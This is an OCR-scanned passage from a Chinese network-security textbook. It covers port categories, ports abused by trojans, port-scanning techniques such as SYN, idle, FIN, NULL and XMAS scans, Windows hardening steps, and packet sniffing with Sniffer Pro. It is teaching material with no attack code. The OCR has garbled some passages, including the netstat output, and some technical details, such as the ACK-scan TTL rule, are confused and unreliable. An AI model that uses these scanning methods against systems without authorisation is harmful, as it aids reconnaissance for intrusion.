口 的 通信 明确 表明 了 某 种 服务 的 协议 ,例如 ,80 端口 实际 上 总 是 HTTP 通信 。 

(2) 注册 端口 : 1024 一 49 151 ,它们 随机 地 为 应 用 程序 提供 服务 ,许多 服务 绑 定 于 这 些 
端口 ,这 些 端口 同样 可 以 用 于 其 他 目的 。 例 如 ,许多 系统 处 理 动态 端口 从 1024 左右 开始 。 

(3) 动态 和 /或 私有 端口 : 从 49 152 一 65 535。 从 理论 上 来 讲 , 不 需要 为 服务 分 配 这 些 
端口 ,实际 上 ,机 器 通常 从 1024 起 分 配 动态 端口 。 但 也 有 例外 : Sun 的 RPC 端口 从 32 768 
开始 。 

2) 按 对 应 的 协议 类 型 端口 有 两 种 

TCP 端口 和 UDP 端口 。 由 于 TCP 和 UDP 两 个 协议 是 独立 的 ,因此 各 自 的 端口 号 也 
相互 独立 ,比如 TCP 有 110 端口 ,UDP 也 可 以 有 110 端口 ,两 者 并 不 冲突 。 

2. 常 被 黑客 利用 的 端口 

一 些 端 口 常常 会 被 黑客 利用 ,还 会 被 一 些 木马 病毒 利用 ,对 计算 机 系统 进行 攻击 。 

(1) 端口 : 8080; 服务 : WWW 代理 服务 ; 8080 端口 同 80 端口 ,可 以 被 各 种 病毒 程序 
所 利用 ,比如 Brown Orifice(BrO) 特 洛 伊 木马 病毒 可 以 利用 8080 端口 完全 遥控 被 感染 的 计 
算 机 。 一 般 我 们 是 使 用 80 端口 进行 网 页 浏览 的 ,为 了 避免 病毒 的 攻击 ,可 以 关闭 该 端口 。 

(2) 端口 : 21; 服务 : FTP; FTP 服务 器 所 开放 的 端口 ,用 于 上 传 和 下 载 。 最 常见 的 攻 
击 者 用 这 个 端口 寻找 打开 anonymous 的 FTP 服务 器 的 方法 。 这 些 服务 器 带 有 可 读 写 的 目 
录 。 木 马 Doly Trojan 、Fore Invisible FTP、WebEx、WinCrash 和 Blade Runner 利用 这 个 
开放 的 端口 进行 攻击 。 

(3) 端口 : 22; 服务 : SSH; 说 明 : PcAnywhere 建立 的 TCP 和 这 一 端口 的 连接 是 为 了 
寻找 SSH。 这 一 服务 有 许多 弱点 ,如 果 配 置 成 特定 的 模式 ,那么 许多 使 用 RSAREF 库 的 版 
本 会 有 不 少 的 漏洞 存在 。 

(4) 端口 : 23; 服务 : Telnet; 远程 登录 ,入 侵 者 可 以 搜索 远程 登录 UNIX 的 服务 。 大 
多 数 情况 下 扫描 这 一 端口 是 为 了 找到 机 器 运行 的 操作 系统 。 还 有 使 用 其 他 技术 ,入 侵 者 也 
会 找到 密码 。 木 马 Tiny Telnet Server 就 使 用 这 个 端口 。 

(5) 端口 : 25; 服务 : SMTP; SMTP 服务 器 所 开放 的 端口 ,用 于 发 送 邮 件 。 入 侵 者 寻 
找 SMTP 服务 器 是 为 了 传递 他 们 的 SPAM。 入 侵 者 的 账户 被 关闭 ,他们 需要 连接 到 高 带宽 
的 E-Mall 服务 器 上 ,将 简单 的 信息 传递 到 不 同 的 地 址 。 木 马 Antigen、Email Password 
Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy 都 开放 这 个 端口 。 

(6) 端口 : 80; 服务 : HTTP; 用 于 网 页 浏览 。 木 马 Executor 开放 此 端口 。 
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(7) 端口 : 119; 服务 : Network News Transfer Protocol; NEWS 新 闻 组 传输 协议 , 承 
载 USENET 通信 。 这 个 端口 的 连接 通常 是 人 们 在 寻找 USENET 服务 器 。 多 数 ISP 限制 
该 服务 ,只 有 他 们 的 客户 才能 访问 他 们 的 新 闻 组 服务 器 。 打 开 新 闻 组 服务 器 将 允许 发 / 读 任 
何人 的 帖子 ,访问 被 限制 的 新 闻 组 服务 器 ,匿名 发 帖 或 发 送 SPAM。 

(8) 端口 : 137、138、139; 服务 : NETBIOS Name Service; 137、138 是 UDP 端口 , 当 通 
过 网 络 邻居 传输 文件 时 用 这 个 端口 。 而 通过 139 端口 进入 的 连接 试图 获得 NetBIOS/SMB 
服务 。 这 个 协议 被 用 于 Windows 文件 .打印 机 共享 和 SAMBA。 另 外 也 用 于 WINS 
Regisrtation 。 

(9) 端口 : 161; 服务 : SNMP; SNMP 允许 远程 管理 设备 。 所 有 配置 和 运行 的 信息 都 
储存 在 数据 库 中 ,通过 SNMP 可 获得 这 些 信 息 。 许 多 管理 员 的 错误 配置 将 被 暴露 在 
Internet 中 。 黑 客 将 会 尝试 使 用 默认 的 密码 public .private 访问 系统 。 他 们 可 能 会 尝试 所 
有 可 能 的 组 合 。SNMP 包 可 能 会 被 错误 地 指向 用 户 的 网 络 。 
查看 端口 的 方法 有 两 种 : 一 种 是 利用 操作 系统 内 置 的 命令 , 另 一 种 是 使 用 端口 扫描 
软件 。 

使 用 “netstat -an” 操 作 系 统 内 管 命令 是 查看 自己 所 开放 端口 的 最 方便 的 方法 ,可 以 在 
cmd 中 输入 这 个 命令 。 使 用 该 命令 后 结果 如 下 所 示 : 





C:\Documents and Settings\Administrator > netstat — an 
Active Connections 


Proto Local Address Foreign Address State 
TCP 0.0.0.0:6195 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:1032 0.0.0.0:0 LISTENING 
TCP 219.246.5.206:139 0.0.0.0:0 LISTENING 
TCP 219.246.5.206:445 219.246.5.94:7101 ESTABLISHED 
UDP 0.0.0.0:161 关 : 关 
UDP 0.0.0.0:445 帝 凑 

3. 端口 扫描 


所 谓 端口 扫描 ,就 是 利用 Socket 编程 与 目标 主机 的 某 些 端口 建立 TCP 连接 、 进 行 传输 
协议 的 验证 等 ,从 而 获知 目标 主机 的 被 扫 端 口 是 否 是 处 于 激活 状态 、 主 机 提供 了 哪些 服务 、 
提供 的 服务 中 是 否 含有 某 些 缺陷 等 等 。 

TCP/IP 协议 中 的 端口 ,是 网 络 通信 进程 的 一 种 标识 符 。 一 个 端口 就 是 一 个 潜在 的 通 
信和 通道 ,也 就 是 一 个 人 侵 通 道 。 对 目标 计算 机 进行 端口 扫描 ,能 得 到 许多 有 用 的 信息 。 通 过 
端口 扫描 ,可 以 得 到 许多 有 用 的 信息 ,从 而 发 现 系统 的 安全 漏洞 。 

端口 扫描 的 方法 是 : 向 目标 主机 的 TCP/IP 服务 端口 发 送 探测 数据 包 , 并 记录 目标 主 
机 的 响应 。 通 过 分 析 响 应 来 判断 服务 端口 是 打开 还 是 关闭 ,就 可 以 得 知 端口 提供 的 服务 或 
信息 。 

端口 扫描 主要 有 全 连接 扫描 、 半 连接 扫描 、SYN 扫描 、 间 接 扫 描 和 隐蔽 (秘密 ) 扫 描 等 。 

(1) 全 连接 扫描 。 这 种 方法 最 简单 ,直接 连 到 目标 端口 并 完成 一 个 完整 的 3 次 握手 过 
程 (SYN、SYN/ACK 和 ACK)。 

操作 系统 提供 的 connect() 函 数 完 成 系统 调用 ,用 来 与 每 一 个 感 兴趣 的 目标 计算 机 的 端 
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口 进行 连接 。 如 果 端 口 处 于 侦 听 状态 ,那么 connect() 函 数 就 能 成 功 ; 否则 ,这 个 端口 是 不 
能 用 的 , 即 没有 提供 服务 。 

这 个 技术 的 一 个 最 大 的 优点 是 不 需要 任何 权限 ,系统 中 的 任何 用 户 都 有 权利 使 用 这 个 
调用 。 另 一 个 好 处 是 速度 较 快 。 如 果 对 每 个 目标 端口 以 线性 的 方式 使 用 单独 的 connect() 
函数 调用 ,那么 将 会 花费 相当 长 的 时 间 ; 为 了 加 快速 度 ,可 以 通过 同时 打开 多 个 套 接 字 , 从 
而 加 速 扫描 。 使 用 非 阻 塞 1/O 允许 你 设置 一 个 低 的 时 间 周 期 ,同时 观察 多 个 套 接 字 。 但 这 
种 方法 的 缺点 是 很 容易 被 发 觉 ,并 且 很 容易 被 过 滤 掉 。 目 标 计 算 机 的 日 志文 件 会 显示 一 连 
串 的 连接 和 连接 出 错 的 服务 消息 ,目标 计算 机 用 户 发 现 后 就 能 很 快 关 闭 它 。 

(2) 半 连 接 扫 描 。 这 种 扫描 是 指 在 源 主机 和 目的 主机 的 3 次 握手 连接 过 程 中 ,只 完成 
前 两 次 ,不 建立 一 次 完整 的 连接 。 这 种 方法 向 目标 端口 发 送 一 个 SYN 分 组 (packet) ,如 果 目 
标 端 口 返回 SYN/ ACK 标志 ,那么 可 以 肯定 该 端口 处 于 检 听 状态 ; 否则 ,返回 的 是 RST/ ACK 
标志 。 这 种 方法 比 第 一 种 更 具 隐 项 性 ,可 能 不 会 在 目标 系统 中 留 下 扫描 痕迹 。 但 这 种 方法 
的 一 个 缺点 是 ,必须 要 有 root 权限 才能 建立 自己 的 SYN 数据 包 。 

(3) SYN 扫描 。SYN 扫描 首先 向 目标 主机 发 送 连接 请 求 , 当 目标 主机 返回 响应 后 , 立 
即 切断 连接 过 程 ,并 查看 响应 情况 。 如 果 目 标 主机 返回 ACK 信息 , 则 表示 目标 主机 的 该 端 
口 开放 ; 如 果 目 标 主机 返回 RESET 信息 , 则 表明 该 端口 没有 开放 。 

(4) ID 头 信息 扫描 。 这 种 扫描 方法 需要 用 一 台 第 三 方 机 器 配合 扫描 ,并 且 这 台 机 器 的 
网 络 通信 和 量 非 常 少 , 即 dumb 主机 。 首 先 由 源 主机 A 向 dump 主机 B 发 送 连接 的 Ping 包 ， 
并 且 查 看 主机 也 返回 的 数据 包 的 ID 头 信息 。 一 般 而 言 ,每 个 按 顺 序 返回 的 数据 包 的 ID 头 
的 值 会 按 顺序 增加 1, 然 后 由 源 主机 A 假冒 主机 B 的 地 址 向 C 的 任意 端口 发 送 SYN 数据 
包 。 这 时 ,主机 C 向 主机 B 发 送 的 数据 包 有 两 种 可 能 的 结果 : SYN/ACK ,表示 该 端口 处 于 
监听 状态 ; RST/ACK ,表示 该 端口 处 于 非 监听 状态 。 那 么 ,由 后 续 Ping 数据 包 的 响应 信息 
的 ID 头 信息 ,可 以 看 出 ,如 果 主 机 C 的 某 个 端口 是 开放 的 , 则 主机 B 返回 A 的 数据 包 中 ,ID 
头 的 值 不 是 以 1 递增 的 ,而 是 大 于 1 的 值 。 如 果 主 机 C 的 某 个 端口 是 非 开 放 的 , 则 主机 B 
会 返回 A 的 数据 包 ,ID 头 的 值 递增 1 ,非常 规律 。 

(5) 隐蔽 扫描 。 隐 蔽 扫描 是 指 能 够 成 功 地 绕 过 IDS、 防 火 墙 和 监视 系统 等 安全 机 制 , 取 
得 目标 主机 端口 信息 的 一 种 扫描 方式 。 

(6) SYN/ACK 扫描 。SYN/ACK 扫描 是 指 由 源 主机 向 目标 主机 的 某 个 端口 直接 发 送 
SYN/ACK 数据 包 ,而 不 是 先 发 送 SYN 信息 包 。 由 于 这 种 方法 不 发 送 SYN 包 , 目 标 主机 
会 认为 这 是 一 次 错误 的 连接 ,从 而 会 报错 。 如 果 目 标 主机 的 该 端口 没有 开放 , 则 会 返回 
RST 信息 ; 如 果 该 端口 处 于 开放 状态 , 则 不 会 返回 任何 信息 ,而 直接 将 这 个 数据 包 抛弃 。 

(7) FIN 扫描 。 这 种 扫描 方式 不 依赖 于 TCP 的 3 次 握手 过 程 ,而 是 TCP 连接 的 FIN 
(结束 ) 位 标志 。 原 理 在 于 TCP 连接 结束 时 ,会 向 TCP 端口 发 送 一 个 设置 了 FIN 位 的 连接 
终止 数据 报 ,关闭 的 端口 会 回答 一 个 设置 了 RST 的 连接 复位 数据 报 ; 而 开放 的 端口 则 会 对 
这 种 可 疑 的 数据 报 不 加 理 皮 ,将 它 丢 奔 。 可 以 根据 是 否 收 到 RST 数据 报 来 判断 对 方 的 端口 
是 否 开放 。 

此 扫描 方式 的 优点 比 前 几 种 都 要 隐秘 ,不 容易 被 发 现 。 该 方案 有 两 个 缺点 : 首先 ,要 判 
断 对 方 端口 是 否 开 放 必 须 等 待 超时 .增加 了 探测 时 间 ,而 且 容 易 得 出 错误 的 结论 ; 其 次 ,一 
些 系统 并 没有 遵循 规定 ,最 典型 的 就 是 Microsoft 公司 所 开发 的 操作 系统 。 这 些 系统 一 旦 
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收 到 这 样 的 数据 报 , 无 论 端口 是 否 开放 都 会 回答 一 个 RST 连接 复位 数据 报 , 这 样 一 来 ,这 种 
扫描 方案 对 于 这 类 操作 系统 就 是 无 效 的 。 

(8) ACK 扫描 。ACK 扫描 是 指 首 先 由 主机 A 向 目标 主机 B 发 送 FIN 数据 包 , 然 后 查 
看 反馈 数据 包 的 TTL 值 和 WIN 值 。 开 放 端 口 所 返回 的 数据 包 的 TTL 值 一 般 不 小 于 64， 
而 关闭 端口 的 返回 值 一 般 大 于 64。 开 放 端 口 所 返回 数据 包 的 WIN 值 一 般 大 于 0 ,而 关闭 端 
口 返回 的 值 一 般 等 于 0。 

(9) NULL 扫描 。NULL 扫描 是 指 将 源 主机 发 送 的 数据 包 中 的 ACK、FIN、RST、 
SYN .URG、PSH 等 标 置 位 都 置 空 。 如 果 目 标 主机 没有 返回 任何 信息 , 则 表明 该 端口 是 开 
放 的 。 如 果 返 回 RST 信息 , 则 端口 是 关闭 的 。 

(10) XMAS 扫描 。XMAS 扫描 的 原理 与 NULL 扫描 相同 ,只 是 将 主机 发 送 的 数据 包 
中 的 ACK、FIN、RST、SYN、URG、PSH 等 标 置 位 都 置 1。 如 果 目 标 主机 没有 返回 任何 信 
息 , 则 表明 该 端口 是 开放 的 。 对 于 所 有 关闭 的 端口 ,目标 系统 应 该 返回 RST 标志 。 

端口 扫描 是 攻击 者 必 备 的 技术 ,通过 扫描 可 以 掌握 攻击 目标 的 开放 服务 ,根据 扫描 所 获 
得 的 信息 ,为 下 一 步 攻击 做 好 准备 。nmap 是 一 个 经 典 的 端口 扫描 器 ,能 实现 上 述 多 种 扫描 
技术 和 方法 。 

需要 强调 的 是 ,网 络 安全 扫描 工具 是 把 双 刃 剑 , 黑 客 利用 它 人 侵 系统 ,而 系统 管理 员 掌 
握 它 以 后 又 可 以 有 效 地 防范 黑客 入 侵 。 

4. 端口 扫描 攻击 技术 的 防范 

对 于 端口 扫描 攻击 的 防范 ,仍然 是 通过 监听 端口 的 状态 进行 的 。 

首先 ,可 以 关闭 闲置 和 有 潜在 危险 的 端口 。 在 Windows NT 核心 系统 (Windows 2000/ 
XP/2003) 中 要 关闭 掉 一 些 闲 置 端口 是 比较 方便 的 ,可 以 采用 “定向 关闭 指定 服务 的 端口 "和 
“只 开放 允许 端口 的 方式 ”。 计 算 机 的 一 些 网 络 服务 会 有 系统 分 配 默认 的 端口 ,将 一 些 闲 置 
的 服务 关闭 掉 , 其 对 应 的 端口 也 会 被 关闭 了 。 操 作 方 法 为 : 进入 "控制 面板 "| ”管理 工具 ”| 
“服务 ”项 内 ,关闭 掉 计算 机 的 一 些 没 有 使 用 的 服务 (如 FTP 服务 .DNS 服务 JIS Admin 服 
务 等 等 ) ,它们 对 应 的 端口 也 被 售 用 了 。 至 于 “只 开放 允许 端口 的 方式 ”, 可 以 利用 系统 的 
“TCP/IP 筛选 ?功能 实现 ,设置 的 时 候 , “只 人 允许 ”系统 的 一 些 基 本 网 络 通信 需要 的 端口 
即 可 。 

其 次 ,可 以 定期 检查 各 端口 ,如 发 现 有 端口 扫描 的 症状 时 , 则 应 立即 屏蔽 该 端口 。 当 然 ， 
如 果 靠 人 工 进行 检查 ,效率 非常 低 , 因 此 一 般 要 采用 相应 的 工具 或 者 设备 ,而 防火 墙 就 是 最 
有 效 的 设备 之 一 。 防 火 墙 对 扫描 类 攻击 的 判断 依据 是 : 设置 一 个 时 间 阔 值 ( 时 间 , 微 秒 级 )， 
若 在 规定 的 时 间 间 隔 内 某 种 数据 包 的 数量 超过 了 某 个 设 定 值 , 即 认定 为 进行 了 一 次 扫描 , 那 
么 将 在 接 下 来 的 一 个 特定 时 间 内 拒绝 来 自 同 一 源 的 这 种 扫描 数据 包 。 


3.3.4 网络 安全 扫描 防范 


防止 黑客 恶意 攻击 的 第 一 步 是 防范 网 络 安全 扫描 。 而 网 络 中 96% 的 扫描 集中 在 端口 
扫描 。 所 以 ,采取 适当 措施 来 防范 端口 扫描 是 防范 网 络 安全 扫描 的 重点 。 下 面 以 Windows 
为 例 , 介 绍 一 下 端口 扫描 的 几 种 防范 措施 。 

(1) 禁用 不 必要 的 端口 。 一 般 来 说 , 仅 打 开 需 要 使 用 的 端口 会 比较 安全 ,但 关闭 端口 意 
味 着 减少 功能 ,所 以 需要 在 安全 和 功能 上 面 做 一 些 平衡 。 一 些 系统 必要 的 通信 端口 ,如 访问 
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网 页 需要 HTTP(80 端口 ) 不 能 被 关闭 。 

(2) 禁用 不 必要 的 协议 。 在 配置 系统 协议 时 ,不 需要 的 协议 统统 删除 。 对 于 服务 器 和 
主机 来 说 ,一 般 只 安装 TCP/IP 协议 就 够 了 。 

方法 是 : 右 击 “ 网 上 邻居 ”, 选 择 * 属 性 ”, 然 后 右 击 “本 地 连接 ”, 选 择 * 属 性 ”, 印 载 不 必要 
的 协议 。 

对 于 协议 和 端口 的 限制 ,也 可 采用 以 下 方法 :“ 网 络 邻居 ”|* 属 性 "|* 本 地 连接 ”|* 属 性 ” 
|*Internet 协议 TCP/IP”|* 属 性 ”|* 高 级 "| 选项 *|*TCP/IP 筛选 ”1“ 属 性”, 选 中 “启用 
TCP/IP 筛选 (所 有 适配器 )”, 只 人 允许 需要 的 TCP、UDP 端口 和 协议 即 可 。 如 图 3-12 所 示 。 

(3) 禁用 NetBIOS。NetBIOS 是 很 多 安全 缺陷 的 源泉 ,对 于 不 需要 提供 文件 和 打印 共 
享 的 主机 ,还 可 以 将 绑 定 在 TCP/IP 协议 的 NetBIOS 关闭 ,避免 针对 NetBIOS 的 攻击 。 

方法 是 : 右 击 * 网 上 邻居 ”, 依 次 选择 “属性 ?|*TCP/IP 协议 ”| 属性 ?|* 高 级 ”, 进 入 “高 
级 TCP/IP 设置 ?对 话 框 , 选 择 WINS 标签 ,选中 “禁用 TCP/IP 上 的 NetBIOS” 一 项 ,关闭 
NetBIOS。 如 图 3-13 所 示 。 

(4) 禁用 不 必要 的 服务 。 服 务 开 的 多 可 以 给 管理 带 来 方便 ,但 开 的 太 多 也 存在 很 多 风 
险 ,特别 是 对 于 那些 管理 员 都 不 用 的 服务 ,最 好 关 掉 ,免得 给 系统 带 来 灾难 。 

以 TCP/IP NetBIOS Helper( 不 需 文件 和 打印 共享 的 用 户 可 禁用 ) 为 例 , 禁 用 TCP/IP 
上 的 NetBIOS 服务 。 首 先 ,进入 “控制 面板 ”的 “管理 工具 ”界面 ,运行 “服务 ”, 进 入 服务 界 
面 ,双击 右 侧 列表 中 需要 禁用 的 服务 ,在 打开 的 服务 属性 的 “常规 ”选项 卡 的 “启动 类 型 "一 
栏 ,选择 “已 禁用 ”, 最 后 确定 即 可 。 
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禁用 其 他 不 必要 的 服务 方法 类 似 , 禁 用 之 后 不 仅 能 保证 Windows 系统 的 安全 性 ,还 可 
以 提高 其 运行 速度 ,可 谓 一 举 两 得 。 
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3.4 网 络 监 听 


3.4.1 网 络 监 听 的 定义 


网 络 监听 (Network Listening) 也 称 网 络 嗅 探 (Network Sniffing)。 网 络 监听 的 目的 是 
截获 通信 的 内 容 , 监 听 的 手段 是 对 协议 进行 分 析 。 

网 络 监听 可 以 在 网 上 的 任何 一 个 位 置 实施 ,如 局 域 网 中 的 一 台 主 机 、 网 关上 或 远程 网 的 
调制 解 调 器 之 间 等 ,但 监听 效果 最 好 的 地 方 是 在 网 关 、 路 由 器 、 防 火 墙 等 设备 处 ,通常 由 网 络 
管理 员 来 操作 。 

网 络 监听 原理 : 我 们 通常 所 说 的 Packet Sniffer 是 指 一 种 插入 到 计算 机 网 络 中 的 “ 偷 
听 ? 网 络 通信 的 设备 ,就 像 是 电话 监控 能 听 到 其 他 人 通过 电话 的 交谈 一 样 。 与 电话 线路 不 
同 ,计算 机 网 络 是 共享 通信 通道 的 。 共 享 意味 着 计算 机 能 够 接收 到 发 送 给 其 他 计算 机 的 信 
息 。 捕 获 在 网 络 中 传输 的 数据 信息 就 称 为 Sniffing( 嗅 探 ) 。 

传统 的 局 域 网 使 用 共享 传输 介质 ,使 用 广播 方式 工作 ,在 报头 中 包含 目标 机 的 正确 地 
址 ,所 以 只 有 与 数据 包 中 目标 地 址 一 致 的 那 台 主机 才 会 接收 数据 包 , 其 他 的 机 器 都 会 将 包 丢 
弃 。 但 是 ,当主 机 工作 在 监听 (又 称 混杂 ) 模 式 下 时 ,无 论 接收 到 的 数据 包 中 目标 地 址 是 什 
么 ,主机 都 将 其 接收 下 来 ,然后 对 数据 包 进 行 分 析 从 而 得 到 局 域 网 中 通信 的 数据 。 

由 于 在 一 个 普通 的 网 络 环境 中 ,账号 和 口令 信息 以 明文 方式 在 以 太 网 中 传输 ,一 旦 入 侵 
者 获得 其 中 一 台 主 机 的 root 权限 ,并 将 其 置 于 监听 模式 以 窃听 网 络 数 据 , 便 有 可 能 入 侵 网 
络 中 的 所 有 计算 机 。 注 意 , 一 台 计 算 机 可 以 监听 同一 网 段 所 有 的 数据 包 , 但 不 能 监听 不 同 网 
段 的 计算 机 传输 的 信息 。 

在 网 络 中 通信 时 , 若 利 用 工具 ,将 网 络 接口 设置 在 监听 模式 , 便 可 将 网 络 中 正在 传播 的 
信息 截获 ,从 而 进行 攻击 。 网 络 监听 技术 的 初衷 是 提供 给 网 络 安全 管理 人 员 进 行 管理 的 工 
具 , 可 以 用 来 监视 网 络 的 状态 .数据 流动 情况 以 及 网 络 上 传输 的 信息 等 。 现 在 网 络 监听 技术 
作为 一 种 工具 ,总 是 扮演 着 正 反 两 方面 的 角色 ,尤其 在 局 域 网 中 ,这 种 表现 更 为 突出 。 对 于 
入 侵 者 来 说 ,通过 网 络 监听 可 以 很 容易 地 获得 用 户 的 关键 信息 。 当 信息 以 明文 的 形式 在 网 
络 上 传输 时 ,只 要 将 网 络 接口 设置 成 监听 模式 , 便 可 以 源源 不 断 地 将 网 上 传输 的 信息 截获 。 
而 对 于 入 侵 检测 和 追踪 者 来 说 ,网 络 监听 技术 又 能 够 在 与 人 侵 者 的 斗争 中 发 挥 重 要 的 作用 ， 
因此 他 们 也 常常 采取 网 络 监 听 技 术 来 防范 黑客 的 非法 入 侵 。 

网 络 监听 可 能 造成 的 危害 包括 以 下 4 个 方面 。 

(1) 能 够 捕获 口令 。 

(2) 能 够 捕获 专用 的 或 者 机 密 的 信息 。 

(3) 可 以 用 来 危害 网 络 邻 居 的 安全 ,或 者 用 来 获取 更 高 级 别 的 访问 权限 。 

(4) 分 析 网 络 结构 ,进行 网 络 渗透 。 

在 Windows 下 ,比较 常用 的 抓 包 工具 有 Sniffer Pro、Wireshark (前 身 Ethereal)、 
Omnipeek( 以 前 的 Etherpeek)、WinDump、Analyzer 等 。 网 络 嗅 探 软件 种 类 很 多 ,主要 是 依 
靠 一 些 特 性 来 区 分 的 。 例 如 ,一 些 网 络 嗅 探 软件 只 支持 以 太 网 适配器 或 无 线 适配器 ,而 有 些 
却 支 持 多 种 类 型 的 适配器 ,并 且 人 允许 用 户 定制 ; 还 有 ,尽管 许多 网 络 嗅 探 软件 可 以 解码 相同 
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的 网 络 协议 ,但 是 ,其 中 的 某 些 嗅 探 软件 有 可 能 比 其 他 的 嗅 探 软件 更 适合 你 的 网 络 结构 。 所 
以 要 结合 自己 的 需要 和 对 网 络 嗅 探 软件 功能 的 了 解 ,最 终 选 择 使 用 哪 一 款 网 络 嗅 探 软件 。 


3.4.2 网 络 协议 分 析 器 工作 原理 


网 络 分 析 (Network analysis) 是 指 通过 捕捉 网 络 流动 的 数据 包 , 查 看 包 内 部 数据 ,进而 
发 现 网 络 中 出 现 的 各 种 问题 的 过 程 。 

1. 捕获 数据 包 的 基础 

网 络 分 析 系 统 首先 依赖 于 一 套 捕 提 网络 数据 包 的 函数 库 。 这 套 函 数 库 工作 在 网 络 分 析 
系统 模块 的 最 底层 。 其 作用 是 从 网 卡 取得 数据 包 或 者 根据 过 滤 规 则 取出 数据 包 的 子 集 , 青 
转交 给 上 层 分 析 模 块 。 从 协议 上 说 ,这 套 函 数 库 将 一 个 数据 包 从 链 路 层 接收 ,至 少将 其 还 原 
至 传输 层 以 上 ,以 供 上 层 分 析 。 

在 Linux 系统 中 ,Libpcap 是 一 个 基于 BPF 的 开放 源码 的 抓 包 函 数 库 。 现 有 的 大 部 分 
Linux 抓 包 工具 都 是 基于 这 套 函 数 库 或 者 是 在 其 基础 上 做 一 些 有 针对 性 的 改进 。 同 样 在 
Windows 系统 中 ,有 这 样 一 个 基本 函数 库 一 一 Winpcap ,在 Windows 运行 的 抓 包工 具 都 以 
它 为 基础 ,完成 捕获 数据 包 、 解 码 , 并 显示 网 络 流量 的 功能 。 

2. 包 捕 获 机 制 

从 广义 的 角度 看 ,一 个 包 捕 获 机 制 包含 3 个 主要 部 分 : 最 底层 是 针对 特定 操作 系统 的 
包 捕 获 机 制 ,最 高 层 是 针对 用 户 程 序 的 接口 ,第 三 部 分 是 包 过 滤 机制 。 不 同 的 操作 系统 实现 
的 底层 包 捕 获 机 制 可 能 是 不 一 样 的 ,但 从 形式 上 看 大 同 小 异 。 数 据 包 常 规 的 传输 路 径 依 次 
为 网 卡 、 设 备 驱 动 层 ,数据 链 路 层 IP 层 、 传 输 层 ,最 后 到 达 应 用 程序 。 而 包 捕 获 机 制 是 在 数 
据 链 路 层 增 加 一 个 旁 路 处 理 ,对 发 送 和 接收 到 的 数据 包 做 过 滤 /缓冲 等 相关 处 理 ,最 后 直接 
传递 到 应 用 程序 。 值 得 注意 的 是 , 包 捕获 机 制 并 不 影响 操作 系统 对 数据 包 的 网 络 处 理 。 对 
用 户 程 序 而 言 , 包 捕获 机 制 提 供 了 一 个 统一 的 接口 ,使 用 户 程序 只 需要 简单 地 调用 若干 函 
数 , 就 能 获得 所 期 望 的 数据 包 。 这 样 一 来 ,针对 特定 操作 系统 的 捕获 机 制 对 用 户 透 明 , 使 用 
户 程序 有 比较 好 的 可 移植 性 。 包 过 滤 机 制 是 对 所 捕获 到 的 数据 包 根据 用 户 的 要 求 进行 得 
选 ,最 终 只 把 满足 过 滤 条 件 的 数据 包 传递 给 用 户 程序 。 

3. 网 络 分 析 软 件 的 原理 

首先 了 解 一 下 网 卡 的 工作 方式 。 在 以 太 网 络 中 ,所 有 通信 都 是 以 广播 方式 工作 的 ,同一 
个 网 段 内 的 所 有 网 络 接口 都 可 以 访问 在 物理 媒体 上 传输 的 所 有 数据 ,而 每 一 个 网 络 接口 都 
有 一 个 唯一 的 硬件 地 址 , 即 MAC 地 址 。 在 正常 的 情况 下 ,一 个 网 络 接口 只 可 能 响应 以 下 两 
种 数据 帧 : 与 自己 MAC 地 址 相 匹配 的 数据 帧 和 发 向 所 有 机 器 的 广播 数据 帧 。 但 在 实际 的 
系统 中 ,数据 的 收发 一 般 都 是 由 网 卡 完成 的 ,而 网 卡 的 工作 模式 有 以 下 4 种 。 

(1) 广播 : 这 种 模式 下 的 网 卡 能 接收 发 给 自己 的 数据 帧 和 网 络 中 的 广播 数据 帧 ; 

(2) 组 播 ( 默 认 ): 这 种 模式 下 的 网 卡 只 能 够 接收 组 播 数据 帧 ; 

(3) 直接 : 这 种 模式 下 的 网 卡 只 能 接收 发 给 自己 的 数据 帧 ; 

(4) 混杂 : 这 种 模式 下 的 网 卡 能 接收 通过 网 络 设备 上 的 所 有 数据 帧 。 

虽然 网 卡 在 默认 情况 下 仅 能 接收 发 给 自己 的 数据 和 网 络 中 的 广播 数据 ,但 我 们 可 以 强 
制 将 网 卡 置 于 混杂 模式 工作 ,那么 此 时 该 网 卡 便 会 接收 所 有 通过 网 络 设备 的 数据 ,而 不 管 该 
数据 的 目的 地 是 哪里 。 
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嗅 探 技 术 : 通过 将 网 卡 的 工作 模式 置 为 混杂 模式 ,并 接收 通过 网 卡 的 所 有 数据 包 , 从 而 
达到 嗅 探 ( 监 听 ) 的 目的 ,这 种 技术 就 是 嗅 探 ( 监 听 ) 技 术 。 结 合 以 上 描述 的 工作 原理 ,网 络 分 
析 软 件 就 是 遵循 以 太 网 工作 模式 , 它 基 于 以 太 网 嗅 探 技 术 , 以 旁 路 接 入 的 方式 进行 工作 。 系 
统 首先 将 本 地 机 器 上 的 网 卡 置 为 混杂 模式 ,使 其 通过 嗅 探 技 术 捕 获 网 络 中 传输 的 所 有 数据 
包 , 然 后 将 这 些 数据 包 传递 到 系统 内 部 进行 分 析 , 再 将 分 析 结 果 以 文本 、 图 表 等 不 同 的 方式 
实时 显示 在 界面 中 。 

4. 常用 网 络 监听 工具 Sniffer Pro 

Sniffer Pro 是 NAI 公司 推出 的 功能 强大 的 协议 分 析 软 件 , 具 有 捕获 网 络 流量 进行 详细 
分 析 、 实 时 监控 网 络 活动 .利用 专家 分 析 系 统 诊断 问题 ,收集 网 络 利用 率 和 错误 等 功能 。 

下 面 通过 捕获 FTP 数据 包 为 例 ,说 明 如 何 使 用 Sniffer Pro。 

(1) 设置 监听 网 卡 。Sniffer Pro 进行 抓 包 时 ,会 自动 检测 出 PC 上 使 用 的 网 络 适配器 ， 
只 要 选择 要 监听 网 络 的 适配器 ,就 可 以 实现 抓 取 数 据 包 。 

(2) 设置 过 滤 规 则 。 在 默认 情况 下 ,Sniffer 将 捕获 其 接 入 碰撞 域 中 流 经 的 所 有 数据 包 ， 
但 为 了 快速 确定 网 络 问 题 的 位 置 , 有 必要 对 所 要 捕获 的 数据 包 作 过 滤 。 

Sniffer 提供 了 捕获 数据 包 前 的 过 滤 规则 的 定义 ,过 滤 规 则 包括 2、3 层 地 址 的 定义 和 几 
百 种 协议 的 定义 。 

在 捕获 流量 时 ,使 用 者 可 以 根据 自己 的 需要 在 不 同时 间 设 置 过 滤器 。 一 种 是 在 抓 包 之 
前 , 先 定义 一 个 过 滤器 ,只 捕获 与 你 正在 分 析 的 问题 有 关 的 数据 包 ; 一 种 是 先 让 Sniffer Pro 
